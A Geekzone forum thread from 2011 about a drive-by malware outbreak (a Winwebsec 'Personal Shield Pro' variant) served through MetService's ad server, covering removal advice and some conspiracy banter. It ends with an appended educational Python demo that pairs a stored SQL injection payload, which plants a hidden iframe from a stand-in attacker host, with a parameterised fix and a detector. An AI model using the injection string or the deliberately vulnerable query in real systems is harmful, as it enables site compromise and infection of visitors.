Geekzone: technology news, blogs, forums
freitasm
  #508053 17-Aug-2011 16:16

DonGould: So far I've read that AVG and MSE aren't stopping it.


Try Norton Power Eraser and let us know: http://security.symantec.com/nbrt/overview.aspx?lcid=1033

 





 


DonGould
  #508070 17-Aug-2011 16:31








cws82us
  #508090 17-Aug-2011 16:45

Maybe it's the govt using it to spy on us. Like they're trying to do.






kiwitrc
  #508099 17-Aug-2011 16:59

cws82us: Maybe it's the govt using it to spy on us. Like they're trying to do.


Bit cold for tin hats, ain't it?

deltadelta
  #508128 17-Aug-2011 17:45

I've acquired a sample that Windows Defender is calling "Rogue:Win32/Winwebsec" - it calls itself "Personal Shield Pro" in the popups that it creates.

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ame=Rogue%3aWin32%2fWinwebsec&threatid=133077 

freitasm
  #508133 17-Aug-2011 17:50

Interesting that was published in 2010, and Microsoft Security Essentials failed to get it...






 


deltadelta
  #508164 17-Aug-2011 18:34

I've just re-scanned it with Microsoft Security Essentials, which did detect it, also as http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Rogue%3aWin32%2fWinwebsec&threatid=2147616725

DonGould
  #508171 17-Aug-2011 18:48

kiwitrc:
cws82us: Maybe it's the govt using it to spy on us. Like they're trying to do.


Bit cold for tin hats, ain't it?


* Does the virus have a back door?
* Was the back door put in the OS by someone's government for someone's government?
* Is the virus there to highlight the government back door to make the OS provider close the door?
* Is the virus an attempt to get into your computer, or an attempt to draw attention to the open door and make sure you actually do something to close it?
* Is the <Insert Government of choice> spying on me, or are they attempting to prevent <Insert another government of choice> from spying on me?

A good friend always tells me the 13th floor has the "antivirus developers" and the 14th floor of the same building has the "virus developers", and it's nothing but a scam to make us spend money on software...

* Or are the hackers being a bit busy because they have too much time on their hands, so infecting a bunch of their customers will give them something else to do for a week or so...

* Or are the sales in <Insert International Cable provider of your choice> down and needing more network traffic to justify <Insert next big upgrade/project of your choice>?

* Or .....  pffft...  you're only paranoid if they're not watching you....


Personally, security always scares the crap out of me...  is mine good enough?  If it is good enough and no one can look in, then do they start to wonder what I'm hiding in here?  So should I have the doors and windows open so people can see I'm not hiding anything I shouldn't be...  but then does that mean someone could put something here that I shouldn't have... and am I compromising my customers and putting myself at risk of breaching privacy rules for not making enough effort to secure data?  Should I use PGP on my email, for example, but then do others have the perception they can communicate things to me they wouldn't if I just have plain text email?  Do I want those messages?

We could play the tin foil hat game all day...  do we sleep better for it?













DonGould
  #508182 17-Aug-2011 19:18

ps - on reading my last post to my wife, she tells me I've got it all wrong...

...it's not governments at all, it's drug companies who make paranoia medicine.







freitasm
  #508360 18-Aug-2011 09:10

Back on topic folks... I want to write instructions on removing this infection. Does anyone have a software recommendation that actually worked?





deltadelta
  #508362 18-Aug-2011 09:24

Malwarebytes Free, installed and updated in Safe Mode with Networking on Windows XP SP3. Run a Full Scan and delete the found items (in my case there was only 1 found, and removing it did the trick).

Consider though that the site may have served up different malware variants to different people (perhaps based on user agent string or JS version?), or that some people will also have other infections in addition to this one that Malwarebytes might find and be unable to fix.

wjw
  #508364 18-Aug-2011 09:29

freitasm: Back on topic folks... I want to write instructions on removing this infection. Does anyone have a software recommendation that actually worked?


I used this:

Malwarebytes Anti-Malware

As linked from here:

wjw: From another website I'm on:
http://deletemalware.blogspot.com/2011/07/how-to-remove-personal-shield-pro.html
Two people so far have said this removal process works
 

freitasm
  #508379 18-Aug-2011 10:05

Folks, at the request of MetService I have created this blog post: http://www.geekzone.co.nz/freitasm/7776

Could you please check that the information is correct, or as close as possible to what we know, and if there's anything else we can add or change, please send me a PM so I can update it?

I guess there will be quite a few readers on that, so it would be good to make it as easy as possible for people to follow.

Thanks!





 


freitasm
  #508397 18-Aug-2011 10:24

Just saw the comments on NBR. People complaining about online ads, etc.
  • This was a drive-by download. No need to click ads.
  • The problem was probably a SQL injection in their ad serving database. This means it could affect ANY database-driven website. They've done it through the ad server because they used a known vulnerability, and as MetService admitted, a new version has been deployed, fixing it. But still, it's not about the ads themselves (unlike the Trade Me case a few months back).
  • It seems the problem was not the browser. The problem was with a Java exploit being used. For example, I am using Internet Explorer and visited the MetService site many times this week but did not have problems because I don't have Java installed on my computer.
 




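The post above attributes the outbreak to a SQL injection in the ad serving database, which is what turns one ad server into a delivery channel for every visitor of every site it feeds. The script below is an added illustration of that mechanism, not code from MetService, its ad server vendor or anyone in this thread. It uses sqlite3 to model an ad-zone lookup that splices the request parameter into the SQL text (and, mimicking a driver configured to accept stacked statements, runs each statement it finds); one attacker request persists a hidden iframe into the stored creative, so every later visitor's page loads it without a click. The parameterised lookup beside it finds no row and changes nothing. The schema, the zone name, the attacker host (attacker.invalid) and the iframe tag are all constructed; the real markup used in the incident is not known from this thread. The last function is the output-side check an image-only ad zone should never fail: a creative carrying script, iframe, object, embed or applet tags.

```python
"""Toy ad server: stored SQL injection in an ad-zone lookup becomes a drive-by.

Everything here is constructed for illustration: the schema, the zone name,
the attacker host (attacker.invalid) and the iframe tag are assumptions, not
artefacts of the MetService incident.
"""
import re
import sqlite3

# Legitimate creative for the zone (constructed).
BANNER = '<img src="/creatives/weather-banner.png" alt="sponsor">'

# Stand-in for an exploit-kit loader tag (constructed; the real markup is unknown).
PAYLOAD_TAG = (
    '<iframe src="http://attacker.invalid/load" width="0" height="0"></iframe>'
)

# Tags that an image-only ad zone has no business serving.
ACTIVE_CONTENT = re.compile(r"<\s*(script|iframe|object|embed|applet)\b", re.I)


def new_ad_db():
    """Fresh in-memory ad database holding one legitimate creative."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (zone TEXT PRIMARY KEY, creative TEXT NOT NULL)")
    conn.execute("INSERT INTO ads VALUES (?, ?)", ("weather-top", BANNER))
    conn.commit()
    return conn


def serve_ad_vulnerable(conn, zone):
    """Vulnerable lookup: the request parameter is spliced into the SQL text.

    Splitting on ';' and running each piece mimics a driver/config that accepts
    stacked statements (an assumption; Python's sqlite3 refuses them per call).
    """
    sql = f"SELECT creative FROM ads WHERE zone = '{zone}'"
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows.extend(conn.execute(stmt).fetchall())
    conn.commit()
    return [creative for (creative,) in rows]


def serve_ad_safe(conn, zone):
    """Hardened lookup: the zone travels as a bound parameter, never as SQL."""
    rows = conn.execute("SELECT creative FROM ads WHERE zone = ?", (zone,)).fetchall()
    return [creative for (creative,) in rows]


def has_active_content(creative):
    """Output-side check: does a creative carry script/iframe/object/embed/applet tags?"""
    return ACTIVE_CONTENT.search(creative) is not None


# Attacker's zone parameter: closes the quote, appends an UPDATE that persists
# the loader tag into the stored creative, and reuses the query's own trailing
# quote so the whole thing stays syntactically valid.
ATTACK_ZONE = (
    "weather-top'; UPDATE ads SET creative = creative || '"
    + PAYLOAD_TAG
    + "' WHERE zone = 'weather-top"
)


def demo():
    """Run the attacker's request, then a victim's, against both lookups."""
    vuln_db = new_ad_db()
    serve_ad_vulnerable(vuln_db, ATTACK_ZONE)  # one poisoned request...
    victim_vulnerable = serve_ad_vulnerable(vuln_db, "weather-top")  # ...hits everyone after

    safe_db = new_ad_db()
    attacker_safe = serve_ad_safe(safe_db, ATTACK_ZONE)  # no such zone; table untouched
    victim_safe = serve_ad_safe(safe_db, "weather-top")

    return {
        "victim_vulnerable": victim_vulnerable,
        "victim_safe": victim_safe,
        "attacker_safe": attacker_safe,
        "flagged": [c for c in victim_vulnerable if has_active_content(c)],
    }


if __name__ == "__main__":
    result = demo()
    print("vulnerable server now serves:", result["victim_vulnerable"])
    print("hardened server still serves:", result["victim_safe"])
    print("active content flagged:", bool(result["flagged"]))
```

Note that the attacker never needs the victims to do anything: the injection is stored, so the poisoned creative rides along with the site's normal ad call, which is what makes the "no need to click ads" point above true. The active-content check is a second line of defence, not a substitute for parameterised queries; a compromised ad server can also serve the loader from a legitimate-looking creative field, which is why the fix on the query side matters.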

 

